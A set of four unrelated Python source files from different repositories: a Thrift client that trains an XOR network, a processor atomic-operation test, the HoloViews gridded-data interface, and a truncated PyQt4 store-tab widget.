# =============================================================================
# walter-weinmann/annlink_thrift :: src_py/test_client.py
# =============================================================================
from erlang_python import ErlangPythonServices
from helper import get_host, get_port
from os.path import basename
from thrift import Thrift
from thrift.protocol import TBinaryProtocol
from thrift.transport import TSocket
from thrift.transport import TTransport


class Dbg(object):
    active = False


DEBUGGER = Dbg()

def main():
    if DEBUGGER.active:
        print("{} - main (): Start".format(basename(__file__)))
    # --------------------------------------------------------------------------
    # Read network parameters
    # --------------------------------------------------------------------------
    host = get_host()
    port = get_port()
    print(("{} - main (): This client will connect to a server with " +
           "ip address {} and port number {}").format(basename(__file__), host, port))
    # --------------------------------------------------------------------------
    # Init thrift connection and protocol handlers
    # --------------------------------------------------------------------------
    # Make socket
    socket = TSocket.TSocket(host, port)
    # Buffering is critical. Raw sockets are very slow
    transport = TTransport.TBufferedTransport(socket)
    # Wrap in a protocol
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    # Create a client to use the protocol encoder
    client = ErlangPythonServices.Client(protocol)
    # Connect to server
    transport.open()
    # --------------------------------------------------------------------------
    # XOR Training
    # --------------------------------------------------------------------------
    # --------------------------------------------------------------------------
    # > annlink:create_neural_network(Conn, [2, 10, 1]).
    # {ClientId,<<"A3zfatHw5jIZVsVaNYDKAemgg0qvQ+le">>}
    # --------------------------------------------------------------------------
    num_inputs = 2
    num_outputs = 1
    learning_rate = 0.001
    model_id = client.initialize_model(num_inputs,
                                       num_outputs,
                                       learning_rate)
    size = 10
    client.add_layer(model_id,
                     size)
    activation = "sigmoid"
    client.add_activation(model_id,
                          activation)
    size = 1
    client.add_layer(model_id,
                     size)
    # --------------------------------------------------------------------------
    # > Inputs = [[0,0],[0,1],[1,0],[1,1]].
    # [[0,0],[0,1],[1,0],[1,1]]
    # > Labels = [[0],[1],[1],[0]].
    # [[0],[1],[1],[0]]
    # > annlink:add_data_chunk(Conn, ClientId, Inputs, Labels).
    # ok
    # --------------------------------------------------------------------------
    inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]
    labels = [[0], [1], [1], [0]]
    scale = []
    client.add_data_chunk(model_id,
                          inputs,
                          labels,
                          scale)
    # --------------------------------------------------------------------------
    # > annlink:set_learning_rate(Conn, ClientId, 0.05).
    # ok
    # --------------------------------------------------------------------------
    learning_rate = 0.05
    client.set_learning_rate(model_id,
                             learning_rate)
    # --------------------------------------------------------------------------
    # > annlink:train(Conn).
    # 0.14462602138519287
    # --------------------------------------------------------------------------
    epochs = 1
    batch_size = 512
    result = client.train(model_id,
                          epochs,
                          batch_size)
    if DEBUGGER.active:
        print("{} - model {} - main (): result from train: {}".format(
            basename(__file__), model_id, result))
    # --------------------------------------------------------------------------
    # > [annlink:train(Conn, ClientId, 200) || _ <- lists:seq(1,5)].
    # which should produce something close to:
    #
    # [0.126319688744843,0.05803197836337134,
    #  1.3663458995789856e-8,6.92154666914746e-17,
    #  6.938893903907228e-18]
    # --------------------------------------------------------------------------
    epochs = 200
    batch_size = 512
    for _ in range(5):
        result = client.train(model_id,
                              epochs,
                              batch_size)
        if DEBUGGER.active:
            print("{} - model {} - main (): result from train: {}".format(
                basename(__file__), model_id, result))
    # --------------------------------------------------------------------------
    # > annlink:predict(Conn, ClientId, [[0,0], [0,1], [1,0], [1,1]]).
    # [[0.0],[1.0],[1.0],[0.0]]
    # --------------------------------------------------------------------------
    data = [[0, 0], [0, 1], [1, 0], [1, 1]]
    result = client.predict(model_id,
                            data)
    if DEBUGGER.active:
        print("{} - model {} - main (): result from predict: {}".format(
            basename(__file__), model_id, result))
    client.terminate_model(model_id)
    # --------------------------------------------------------------------------
    # Terminate client
    # --------------------------------------------------------------------------
    # Close the connection
    transport.close()
    if DEBUGGER.active:
        print("{} - main (): Done".format(basename(__file__)))


if __name__ == "__main__":
    if DEBUGGER.active:
        print("{} - __main__ (): Start".format(basename(__file__)))
    try:
        main()
        if DEBUGGER.active:
            print("{} - __main__ (): Done".format(basename(__file__)))
    except Thrift.TException as tx:
        print("{} - __main__ (): Exception: {}".format(basename(__file__), tx.message))

# =============================================================================
# jbush001/NyuziProcessor :: tests/stress/atomic/runtest.py
# =============================================================================
#!/usr/bin/env python3
#
# Copyright 2011-2015 Jeff Bush
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Test load_sync/store_sync instructions.
This uses four threads to update variables round-robin.
"""
import os
import struct
import sys
sys.path.insert(0, '../..')
import test_harness
MEM_DUMP_FILE = os.path.join(test_harness.WORK_DIR, 'vmem.bin')
@test_harness.test(['verilator'])
def atomic(_, target):
    hex_file = test_harness.build_program(['atomic.S'])
    test_harness.run_program(
        hex_file,
        target,
        dump_file=MEM_DUMP_FILE,
        dump_base=0x100000,
        dump_length=0x800,
        flush_l2=True)

    with open(MEM_DUMP_FILE, 'rb') as memfile:
        for _ in range(512):
            val = memfile.read(4)
            if len(val) < 4:
                raise test_harness.TestException('output file is truncated')

            num_val, = struct.unpack('<L', val)
            if num_val != 10:
                raise test_harness.TestException(
                    'FAIL: mismatch: ' + str(num_val))


test_harness.execute_tests()

# =============================================================================
# basnijholt/holoviews :: holoviews/core/data/grid.py
# =============================================================================
from __future__ import absolute_import
import sys
import datetime as dt
from collections import OrderedDict, defaultdict, Iterable
try:
    import itertools.izip as zip
except ImportError:
    pass
import numpy as np
from .dictionary import DictInterface
from .interface import Interface, DataError
from ..dimension import dimension_name
from ..element import Element
from ..dimension import OrderedDict as cyODict
from ..ndmapping import NdMapping, item_check, sorted_context
from .. import util
from .interface import is_dask, dask_array_module, get_array_types
class GridInterface(DictInterface):
"""
Interface for simple dictionary-based dataset format using a
compressed representation that uses the cartesian product between
key dimensions. As with DictInterface, the dictionary keys correspond
to the column (i.e dimension) names and the values are NumPy arrays
representing the values in that column.
To use this compressed format, the key dimensions must be orthogonal
to one another with each key dimension specifying an axis of the
multidimensional space occupied by the value dimension data. For
instance, given an temperature recordings sampled regularly across
the earth surface, a list of N unique latitudes and M unique
longitudes can specify the position of NxM temperature samples.
"""

    types = (dict, OrderedDict, cyODict)

    datatype = 'grid'

    gridded = True

    @classmethod
    def init(cls, eltype, data, kdims, vdims):
        if kdims is None:
            kdims = eltype.kdims
        if vdims is None:
            vdims = eltype.vdims

        if not vdims:
            raise ValueError('GridInterface interface requires at least '
                             'one value dimension.')

        ndims = len(kdims)
        dimensions = [dimension_name(d) for d in kdims+vdims]
        if isinstance(data, tuple):
            data = {d: v for d, v in zip(dimensions, data)}
        elif isinstance(data, list) and data == []:
            data = OrderedDict([(d, []) for d in dimensions])
        elif not any(isinstance(data, tuple(t for t in interface.types if t is not None))
                     for interface in cls.interfaces.values()):
            data = {k: v for k, v in zip(dimensions, zip(*data))}
        elif isinstance(data, np.ndarray):
            if data.ndim == 1:
                if eltype._auto_indexable_1d and len(kdims)+len(vdims) > 1:
                    data = np.column_stack([np.arange(len(data)), data])
                else:
                    data = np.atleast_2d(data).T
            data = {k: data[:, i] for i, k in enumerate(dimensions)}
        elif isinstance(data, list) and data == []:
            data = {d: np.array([]) for d in dimensions[:ndims]}
            data.update({d: np.empty((0,) * ndims) for d in dimensions[ndims:]})
        elif not isinstance(data, dict):
            raise TypeError('GridInterface must be instantiated as a '
                            'dictionary or tuple')

        for dim in kdims+vdims:
            name = dimension_name(dim)
            if name not in data:
                raise ValueError("Values for dimension %s not found" % dim)
            if not isinstance(data[name], get_array_types()):
                data[name] = np.array(data[name])

        kdim_names = [dimension_name(d) for d in kdims]
        vdim_names = [dimension_name(d) for d in vdims]
        expected = tuple([len(data[kd]) for kd in kdim_names])
        irregular_shape = data[kdim_names[0]].shape if kdim_names else ()
        valid_shape = irregular_shape if len(irregular_shape) > 1 else expected[::-1]
        shapes = tuple([data[kd].shape for kd in kdim_names])
        for vdim in vdim_names:
            shape = data[vdim].shape
            error = DataError if len(shape) > 1 else ValueError
            if (not expected and shape == (1,)) or (len(set((shape,)+shapes)) == 1 and len(shape) > 1):
                # If empty or an irregular mesh
                pass
            elif len(shape) != len(expected):
                raise error('The shape of the %s value array does not '
                            'match the expected dimensionality indicated '
                            'by the key dimensions. Expected %d-D array, '
                            'found %d-D array.' % (vdim, len(expected), len(shape)))
            elif any((s != e and (s+1) != e) for s, e in zip(shape, valid_shape)):
                raise error('Key dimension values and value array %s '
                            'shapes do not match. Expected shape %s, '
                            'actual shape: %s' % (vdim, valid_shape, shape), cls)
        return data, {'kdims': kdims, 'vdims': vdims}, {}
    @classmethod
    def concat(cls, datasets, dimensions, vdims):
        from . import Dataset
        with sorted_context(False):
            datasets = NdMapping(datasets, kdims=dimensions)
            datasets = datasets.clone([(k, v.data if isinstance(v, Dataset) else v)
                                       for k, v in datasets.data.items()])
        if len(datasets.kdims) > 1:
            items = datasets.groupby(datasets.kdims[:-1]).data.items()
            return cls.concat([(k, cls.concat(v, v.kdims, vdims=vdims)) for k, v in items],
                              datasets.kdims[:-1], vdims)
        return cls.concat_dim(datasets, datasets.kdims[0], vdims)

    @classmethod
    def concat_dim(cls, datasets, dim, vdims):
        values, grids = zip(*datasets.items())
        new_data = {k: v for k, v in grids[0].items() if k not in vdims}
        new_data[dim.name] = np.array(values)
        for vdim in vdims:
            arrays = [grid[vdim.name] for grid in grids]
            shapes = set(arr.shape for arr in arrays)
            if len(shapes) > 1:
                raise DataError('When concatenating gridded data the shape '
                                'of arrays must match. %s found that arrays '
                                'along the %s dimension do not match.' %
                                (cls.__name__, vdim.name))
            stack = dask_array_module().stack if any(is_dask(arr) for arr in arrays) else np.stack
            new_data[vdim.name] = stack(arrays, -1)
        return new_data

    @classmethod
    def irregular(cls, dataset, dim):
        return dataset.data[dimension_name(dim)].ndim > 1

    @classmethod
    def isscalar(cls, dataset, dim):
        values = cls.values(dataset, dim, expanded=False)
        return values.shape in ((), (1,)) or len(np.unique(values)) == 1

    @classmethod
    def validate(cls, dataset, vdims=True):
        Interface.validate(dataset, vdims)

    @classmethod
    def dimension_type(cls, dataset, dim):
        if dim in dataset.dimensions():
            arr = cls.values(dataset, dim, False, False)
        else:
            return None
        return arr.dtype.type

    @classmethod
    def shape(cls, dataset, gridded=False):
        shape = dataset.data[dataset.vdims[0].name].shape
        if gridded:
            return shape
        else:
            return (np.product(shape, dtype=np.intp), len(dataset.dimensions()))

    @classmethod
    def length(cls, dataset):
        return cls.shape(dataset)[0]

    @classmethod
    def _infer_interval_breaks(cls, coord, axis=0):
        """
        >>> GridInterface._infer_interval_breaks(np.arange(5))
        array([-0.5,  0.5,  1.5,  2.5,  3.5,  4.5])
        >>> GridInterface._infer_interval_breaks([[0, 1], [3, 4]], axis=1)
        array([[-0.5,  0.5,  1.5],
               [ 2.5,  3.5,  4.5]])
        """
        coord = np.asarray(coord)
        if sys.version_info.major == 2 and len(coord) and isinstance(coord[0], (dt.datetime, dt.date)):
            # np.diff does not work on datetimes in python 2
            coord = coord.astype('datetime64')
        if len(coord) == 0:
            return np.array([], dtype=coord.dtype)
        deltas = 0.5 * np.diff(coord, axis=axis)
        first = np.take(coord, [0], axis=axis) - np.take(deltas, [0], axis=axis)
        last = np.take(coord, [-1], axis=axis) + np.take(deltas, [-1], axis=axis)
        trim_last = tuple(slice(None, -1) if n == axis else slice(None)
                          for n in range(coord.ndim))
        return np.concatenate([first, coord[trim_last] + deltas, last], axis=axis)
    @classmethod
    def coords(cls, dataset, dim, ordered=False, expanded=False, edges=False):
        """
        Returns the coordinates along a dimension. Ordered ensures
        coordinates are in ascending order and expanded creates an
        ND-array matching the dimensionality of the dataset.
        """
        dim = dataset.get_dimension(dim, strict=True)
        irregular = cls.irregular(dataset, dim)
        if irregular or expanded:
            if irregular:
                data = dataset.data[dim.name]
            else:
                data = util.expand_grid_coords(dataset, dim)
            if edges and data.shape == dataset.data[dataset.vdims[0].name].shape:
                data = cls._infer_interval_breaks(data, axis=1)
                data = cls._infer_interval_breaks(data, axis=0)
            return data

        data = dataset.data[dim.name]
        if ordered and np.all(data[1:] < data[:-1]):
            data = data[::-1]
        shape = cls.shape(dataset, True)
        if dim in dataset.kdims:
            idx = dataset.get_dimension_index(dim)
            isedges = (dim in dataset.kdims and len(shape) == dataset.ndims
                       and len(data) == (shape[dataset.ndims-idx-1]+1))
        else:
            isedges = False
        if edges and not isedges:
            data = cls._infer_interval_breaks(data)
        elif not edges and isedges:
            data = data[:-1] + np.diff(data)/2.
        return data
    @classmethod
    def canonicalize(cls, dataset, data, data_coords=None, virtual_coords=[]):
        """
        Canonicalize takes an array of values as input and reorients
        and transposes it to match the canonical format expected by
        plotting functions. In certain cases the dimensions defined
        via the kdims of an Element may not match the dimensions of
        the underlying data. A set of data_coords may be passed in to
        define the dimensionality of the data, which can then be used
        to np.squeeze the data to remove any constant dimensions. If
        the data is also irregular, i.e. contains multi-dimensional
        coordinates, a set of virtual_coords can be supplied, required
        by some interfaces (e.g. xarray) to index irregular datasets
        with a virtual integer index. This ensures these coordinates
        are not simply dropped.
        """
        if data_coords is None:
            data_coords = dataset.dimensions('key', label='name')[::-1]

        # Transpose data
        dims = [name for name in data_coords
                if isinstance(cls.coords(dataset, name), get_array_types())]
        dropped = [dims.index(d) for d in dims
                   if d not in dataset.kdims+virtual_coords]
        if dropped:
            data = np.squeeze(data, axis=tuple(dropped))
        if not any(cls.irregular(dataset, d) for d in dataset.kdims):
            inds = [dims.index(kd.name) for kd in dataset.kdims]
            inds = [i - sum([1 for d in dropped if i >= d]) for i in inds]
            if inds:
                data = data.transpose(inds[::-1])

        # Reorient data
        invert = False
        slices = []
        for d in dataset.kdims[::-1]:
            coords = cls.coords(dataset, d)
            if np.all(coords[1:] < coords[:-1]) and not coords.ndim > 1:
                slices.append(slice(None, None, -1))
                invert = True
            else:
                slices.append(slice(None))
        data = data[tuple(slices)] if invert else data

        # Allow lower dimensional views into data
        if len(dataset.kdims) < 2:
            data = data.flatten()
        return data

    @classmethod
    def invert_index(cls, index, length):
        if np.isscalar(index):
            return length - index
        elif isinstance(index, slice):
            start, stop = index.start, index.stop
            new_start, new_stop = None, None
            if start is not None:
                new_stop = length - start
            if stop is not None:
                new_start = length - stop
            return slice(new_start-1, new_stop-1)
        elif isinstance(index, Iterable):
            new_index = []
            for ind in index:
                new_index.append(length-ind)
            return new_index

    @classmethod
    def ndloc(cls, dataset, indices):
        selected = {}
        adjusted_inds = []
        all_scalar = True
        for i, (kd, ind) in enumerate(zip(dataset.kdims[::-1], indices)):
            coords = cls.coords(dataset, kd.name, True)
            if np.isscalar(ind):
                ind = [ind]
            else:
                all_scalar = False
            selected[kd.name] = coords[ind]
            adjusted_inds.append(ind)
        for kd in dataset.kdims:
            if kd.name not in selected:
                coords = cls.coords(dataset, kd.name)
                selected[kd.name] = coords
                all_scalar = False
        for d in dataset.dimensions():
            if d in dataset.kdims and not cls.irregular(dataset, d):
                continue
            arr = cls.values(dataset, d, flat=False, compute=False)
            if all_scalar and len(dataset.vdims) == 1:
                return arr[tuple(ind[0] for ind in adjusted_inds)]
            selected[d.name] = arr[tuple(adjusted_inds)]
        return tuple(selected[d.name] for d in dataset.dimensions())
    @classmethod
    def values(cls, dataset, dim, expanded=True, flat=True, compute=True):
        dim = dataset.get_dimension(dim, strict=True)
        if dim in dataset.vdims or dataset.data[dim.name].ndim > 1:
            data = dataset.data[dim.name]
            data = cls.canonicalize(dataset, data)
            da = dask_array_module()
            if compute and da and isinstance(data, da.Array):
                data = data.compute()
            return data.T.flatten() if flat else data
        elif expanded:
            data = cls.coords(dataset, dim.name, expanded=True)
            return data.T.flatten() if flat else data
        else:
            return cls.coords(dataset, dim.name, ordered=True)

    @classmethod
    def groupby(cls, dataset, dim_names, container_type, group_type, **kwargs):
        # Get dimensions information
        dimensions = [dataset.get_dimension(d, strict=True) for d in dim_names]
        if 'kdims' in kwargs:
            kdims = kwargs['kdims']
        else:
            kdims = [kdim for kdim in dataset.kdims if kdim not in dimensions]
            kwargs['kdims'] = kdims

        invalid = [d for d in dimensions if dataset.data[d.name].ndim > 1]
        if invalid:
            if len(invalid) == 1: invalid = "'%s'" % invalid[0]
            raise ValueError("Cannot groupby irregularly sampled dimension(s) %s."
                             % invalid)

        # Update the kwargs appropriately for Element group types
        group_kwargs = {}
        group_type = dict if group_type == 'raw' else group_type
        if issubclass(group_type, Element):
            group_kwargs.update(util.get_param_values(dataset))
        else:
            kwargs.pop('kdims')
        group_kwargs.update(kwargs)

        drop_dim = any(d not in group_kwargs['kdims'] for d in kdims)

        # Find all the keys along supplied dimensions
        keys = [cls.coords(dataset, d.name) for d in dimensions]
        transpose = [dataset.ndims-dataset.kdims.index(kd)-1 for kd in kdims]
        transpose += [i for i in range(dataset.ndims) if i not in transpose]

        # Iterate over the unique entries applying selection masks
        grouped_data = []
        for unique_key in zip(*util.cartesian_product(keys)):
            select = dict(zip(dim_names, unique_key))
            if drop_dim:
                group_data = dataset.select(**select)
                group_data = group_data if np.isscalar(group_data) else group_data.columns()
            else:
                group_data = cls.select(dataset, **select)

            if np.isscalar(group_data) or (isinstance(group_data, get_array_types()) and group_data.shape == ()):
                group_data = {dataset.vdims[0].name: np.atleast_1d(group_data)}
                for dim, v in zip(dim_names, unique_key):
                    group_data[dim] = np.atleast_1d(v)
            elif not drop_dim:
                if isinstance(group_data, get_array_types()):
                    group_data = {dataset.vdims[0].name: group_data}
                for vdim in dataset.vdims:
                    data = group_data[vdim.name]
                    data = data.transpose(transpose[::-1])
                    group_data[vdim.name] = np.squeeze(data)
            group_data = group_type(group_data, **group_kwargs)
            grouped_data.append((tuple(unique_key), group_data))

        if issubclass(container_type, NdMapping):
            with item_check(False):
                return container_type(grouped_data, kdims=dimensions)
        else:
            return container_type(grouped_data)
    @classmethod
    def key_select_mask(cls, dataset, values, ind):
        if isinstance(ind, tuple):
            ind = slice(*ind)
        if isinstance(ind, get_array_types()):
            mask = ind
        elif isinstance(ind, slice):
            mask = True
            if ind.start is not None:
                mask &= ind.start <= values
            if ind.stop is not None:
                mask &= values < ind.stop
            # Expand empty mask
            if mask is True:
                mask = np.ones(values.shape, dtype=np.bool)
        elif isinstance(ind, (set, list)):
            iter_slcs = []
            for ik in ind:
                iter_slcs.append(values == ik)
            mask = np.logical_or.reduce(iter_slcs)
        elif callable(ind):
            mask = ind(values)
        elif ind is None:
            mask = None
        else:
            index_mask = values == ind
            if (dataset.ndims == 1 or dataset._binned) and np.sum(index_mask) == 0:
                data_index = np.argmin(np.abs(values - ind))
                mask = np.zeros(len(values), dtype=np.bool)
                mask[data_index] = True
            else:
                mask = index_mask
        if mask is None:
            mask = np.ones(values.shape, dtype=bool)
        return mask

    @classmethod
    def select(cls, dataset, selection_mask=None, **selection):
        dimensions = dataset.kdims
        val_dims = [vdim for vdim in dataset.vdims if vdim in selection]
        if val_dims:
            raise IndexError('Cannot slice value dimensions in compressed format, '
                             'convert to expanded format before slicing.')

        indexed = cls.indexed(dataset, selection)
        full_selection = [(d, selection.get(d.name, selection.get(d.label)))
                          for d in dimensions]
        data = {}
        value_select = []
        for i, (dim, ind) in enumerate(full_selection):
            irregular = cls.irregular(dataset, dim)
            values = cls.coords(dataset, dim, irregular)
            mask = cls.key_select_mask(dataset, values, ind)
            if irregular:
                if np.isscalar(ind) or isinstance(ind, (set, list)):
                    raise IndexError("Indexing not supported for irregularly "
                                     "sampled data. %s value along %s dimension."
                                     "must be a slice or 2D boolean mask."
                                     % (ind, dim))
                mask = mask.max(axis=i)
            elif dataset._binned:
                edges = cls.coords(dataset, dim, False, edges=True)
                inds = np.argwhere(mask)
                if np.isscalar(ind):
                    emin, emax = edges.min(), edges.max()
                    if ind < emin:
                        raise IndexError("Index %s less than lower bound "
                                         "of %s for %s dimension." % (ind, emin, dim))
                    elif ind >= emax:
                        raise IndexError("Index %s more than or equal to upper bound "
                                         "of %s for %s dimension." % (ind, emax, dim))
                    idx = max([np.digitize([ind], edges)[0]-1, 0])
                    mask = np.zeros(len(values), dtype=np.bool)
                    mask[idx] = True
                    values = edges[idx:idx+2]
                elif len(inds):
                    values = edges[inds.min(): inds.max()+2]
                else:
                    values = edges[0:0]
            else:
                values = values[mask]

            values, mask = np.asarray(values), np.asarray(mask)
            value_select.append(mask)
            data[dim.name] = np.array([values]) if np.isscalar(values) else values

        int_inds = [np.argwhere(v) for v in value_select][::-1]
        index = np.ix_(*[np.atleast_1d(np.squeeze(ind)) if ind.ndim > 1 else np.atleast_1d(ind)
                         for ind in int_inds])

        for kdim in dataset.kdims:
            if cls.irregular(dataset, dim):
                da = dask_array_module()
                if da and isinstance(dataset.data[kdim.name], da.Array):
                    data[kdim.name] = dataset.data[kdim.name].vindex[index]
                else:
                    data[kdim.name] = np.asarray(data[kdim.name])[index]

        for vdim in dataset.vdims:
            da = dask_array_module()
            if da and isinstance(dataset.data[vdim.name], da.Array):
                data[vdim.name] = dataset.data[vdim.name].vindex[index]
            else:
                data[vdim.name] = np.asarray(dataset.data[vdim.name])[index]

        if indexed:
            if len(dataset.vdims) == 1:
                da = dask_array_module()
                arr = np.squeeze(data[dataset.vdims[0].name])
                if da and isinstance(arr, da.Array):
                    arr = arr.compute()
                return arr if np.isscalar(arr) else arr[()]
            else:
                return np.array([np.squeeze(data[vd.name])
                                 for vd in dataset.vdims])
        return data
    @classmethod
    def sample(cls, dataset, samples=[]):
        """
        Samples the gridded data into a dataset of samples.
        """
        ndims = dataset.ndims
        dimensions = dataset.dimensions(label='name')
        arrays = [dataset.data[vdim.name] for vdim in dataset.vdims]
        data = defaultdict(list)

        for sample in samples:
            if np.isscalar(sample): sample = [sample]
            if len(sample) != ndims:
                sample = [sample[i] if i < len(sample) else None
                          for i in range(ndims)]
            sampled, int_inds = [], []
            for d, ind in zip(dimensions, sample):
                cdata = dataset.data[d]
                mask = cls.key_select_mask(dataset, cdata, ind)
                inds = np.arange(len(cdata)) if mask is None else np.argwhere(mask)
                int_inds.append(inds)
                sampled.append(cdata[mask])
            for d, arr in zip(dimensions, np.meshgrid(*sampled)):
                data[d].append(arr)
            for vdim, array in zip(dataset.vdims, arrays):
                da = dask_array_module()
                flat_index = np.ravel_multi_index(tuple(int_inds)[::-1], array.shape)
                if da and isinstance(array, da.Array):
                    data[vdim.name].append(array.flatten().vindex[tuple(flat_index)])
                else:
                    data[vdim.name].append(array.flat[flat_index])
        concatenated = {d: np.concatenate(arrays).flatten() for d, arrays in data.items()}
        return concatenated
    @classmethod
    def aggregate(cls, dataset, kdims, function, **kwargs):
        kdims = [dimension_name(kd) for kd in kdims]
        data = {kdim: dataset.data[kdim] for kdim in kdims}
        axes = tuple(dataset.ndims-dataset.get_dimension_index(kdim)-1
                     for kdim in dataset.kdims if kdim not in kdims)
        da = dask_array_module()
        dropped = []
        for vdim in dataset.vdims:
            values = dataset.data[vdim.name]
            atleast_1d = da.atleast_1d if is_dask(values) else np.atleast_1d
            try:
                data[vdim.name] = atleast_1d(function(values, axis=axes, **kwargs))
            except TypeError:
                dropped.append(vdim)
        return data, dropped

    @classmethod
    def reindex(cls, dataset, kdims, vdims):
        dropped_kdims = [kd for kd in dataset.kdims if kd not in kdims]
        dropped_vdims = ([vdim for vdim in dataset.vdims
                          if vdim not in vdims] if vdims else [])
        constant = {}
        for kd in dropped_kdims:
            vals = cls.values(dataset, kd.name, expanded=False)
            if len(vals) == 1:
                constant[kd.name] = vals[0]
        data = {k: values for k, values in dataset.data.items()
                if k not in dropped_kdims+dropped_vdims}

        if len(constant) == len(dropped_kdims):
            joined_dims = kdims+dropped_kdims
            axes = tuple(dataset.ndims-dataset.kdims.index(d)-1
                         for d in joined_dims)
            dropped_axes = tuple(dataset.ndims-joined_dims.index(d)-1
                                 for d in dropped_kdims)
            for vdim in vdims:
                vdata = data[vdim.name]
                if len(axes) > 1:
                    vdata = vdata.transpose(axes[::-1])
                if dropped_axes:
                    vdata = np.squeeze(vdata, axis=dropped_axes)
                data[vdim.name] = vdata
            return data
        elif dropped_kdims:
            return tuple(dataset.columns(kdims+vdims).values())
        return data

    @classmethod
    def add_dimension(cls, dataset, dimension, dim_pos, values, vdim):
        if not vdim:
            raise Exception("Cannot add key dimension to a dense representation.")
        dim = dimension_name(dimension)
        return dict(dataset.data, **{dim: values})

    @classmethod
    def sort(cls, dataset, by=[], reverse=False):
        if not by or by in [dataset.kdims, dataset.dimensions()]:
            return dataset.data
        else:
            raise Exception('Compressed format cannot be sorted, either instantiate '
                            'in the desired order or use the expanded format.')

    @classmethod
    def iloc(cls, dataset, index):
        rows, cols = index
        scalar = False
        if np.isscalar(cols):
            scalar = np.isscalar(rows)
            cols = [dataset.get_dimension(cols, strict=True)]
        elif isinstance(cols, slice):
            cols = dataset.dimensions()[cols]
        else:
            cols = [dataset.get_dimension(d, strict=True) for d in cols]

        if np.isscalar(rows):
            rows = [rows]

        new_data = []
        for d in cols:
            new_data.append(cls.values(dataset, d, compute=False)[rows])

        if scalar:
            da = dask_array_module()
            if new_data and (da and isinstance(new_data[0], da.Array)):
                return new_data[0].compute()[0]
            return new_data[0][0]
        return tuple(new_data)

    @classmethod
    def range(cls, dataset, dimension):
        if dataset._binned and dimension in dataset.kdims:
            expanded = cls.irregular(dataset, dimension)
            column = cls.coords(dataset, dimension, expanded=expanded, edges=True)
        else:
            column = cls.values(dataset, dimension, expanded=False, flat=False)
        da = dask_array_module()
        if column.dtype.kind == 'M':
            dmin, dmax = column.min(), column.max()
            if da and isinstance(column, da.Array):
                return da.compute(dmin, dmax)
            return dmin, dmax
        elif len(column) == 0:
            return np.NaN, np.NaN
        else:
            try:
                dmin, dmax = (np.nanmin(column), np.nanmax(column))
                if da and isinstance(column, da.Array):
                    return da.compute(dmin, dmax)
                return dmin, dmax
            except TypeError:
                column.sort()
                return column[0], column[-1]


Interface.register(GridInterface)

# =============================================================================
# cgsheeh/SFWR3XA3_Redevelopment :: src/TabWidgets.py
# =============================================================================
# -*- coding: utf-8 -*-
#
# Created: Fri Nov 13 14:07:26 2015
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
import hashlib
from PyQt4 import QtCore, QtGui
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s

try:
    _encoding = QtGui.QApplication.UnicodeUTF8

    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)


##
# storeTab2
# This class is the GUI for a user's store.
class storeTab2(QtGui.QWidget):
    ##
    # Constructor
    # Creates a user's store for viewing.
    # @param merchant_representation: holds the store's data representation
    def __init__(self, merchant_representation):
        super(storeTab2, self).__init__()
        self.setObjectName(_fromUtf8("Form"))
        self.resize(1038, 686)
        self.label_11 = QtGui.QLabel(self)
        self.label_11.setGeometry(QtCore.QRect(540, 6, 231, 211))
        self.label_11.setText(_fromUtf8(""))
        self.label_11.setObjectName(_fromUtf8("label_11"))
        self.label_12 = QtGui.QLabel(self)
        self.label_12.setGeometry(QtCore.QRect(0, 460, 111, 17))
        self.label_12.setObjectName(_fromUtf8("label_12"))
        ##
        # Set up table of user contracts and headers
        self.contractTable = QtGui.QTableWidget(self)
        self.contractTable.setGeometry(QtCore.QRect(0, 480, 1031, 201))
        self.contractTable.setObjectName(_fromUtf8("contractTable"))
        self.contractTable.setColumnCount(4)
        item = QtGui.QTableWidgetItem()
        item.setText("Item Name")
        self.contractTable.setHorizontalHeaderItem(0, item)
        item = QtGui.QTableWidgetItem()
        item.setText("Price")
        self.contractTable.setHorizontalHeaderItem(1, item)
        item = QtGui.QTableWidgetItem()
        item.setText("Expiry")
        self.contractTable.setHorizontalHeaderItem(2, item)
        item = QtGui.QTableWidgetItem()
        item.setText("Description")
        self.contractTable.setHorizontalHeaderItem(3, item)
        self.contractTable.itemClicked.connect(self.contract_clicked)
        ##
        # Add listings to table of contracts
        for count, listing in enumerate(merchant_representation.get_listings()):
            trade_info = listing.get_module('trade')
            metadata = listing.get_module('metadata')
            ##
            # Set row label to contract hash
            self.contractTable.setRowCount(count + 1)
            item = QtGui.QTableWidgetItem()
            item.setText(str(listing.contract_hash()))
            item.setData(QtCore.Qt.UserRole, listing)
            self.contractTable.setVerticalHeaderItem(count, item)
            item = QtGui.QTableWidgetItem()
            item.setText(trade_info['name'])
            item.setData(QtCore.Qt.UserRole, listing)
            self.contractTable.setItem(count, 0, item)
            item = QtGui.QTableWidgetItem()
            item.setText(trade_info['price'])
            item.setData(QtCore.Qt.UserRole, listing)
            self.contractTable.setItem(count, 1, item)
            item = QtGui.QTableWidgetItem()
            item.setText(metadata['expiry'])
            item.setData(QtCore.Qt.UserRole, listing)
            self.contractTable.setItem(count, 2, item)
            item = QtGui.QTableWidgetItem()
            item.setText(trade_info['description'])
            item.setData(QtCore.Qt.UserRole, listing)
            self.contractTable.setItem(count, 3, item)
        self.gridLayoutWidget = QtGui.QWidget(self)
        self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 10, 771, 406))
        self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
        self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
        self.gridLayout.setMargin(0)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.publicKey = QtGui.QTextEdit(self.gridLayoutWidget)
        self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.publicKey.setObjectName(_fromUtf8("publicKey"))
        self.gridLayout.addWidget(self.publicKey, 3, 1, 1, 1)
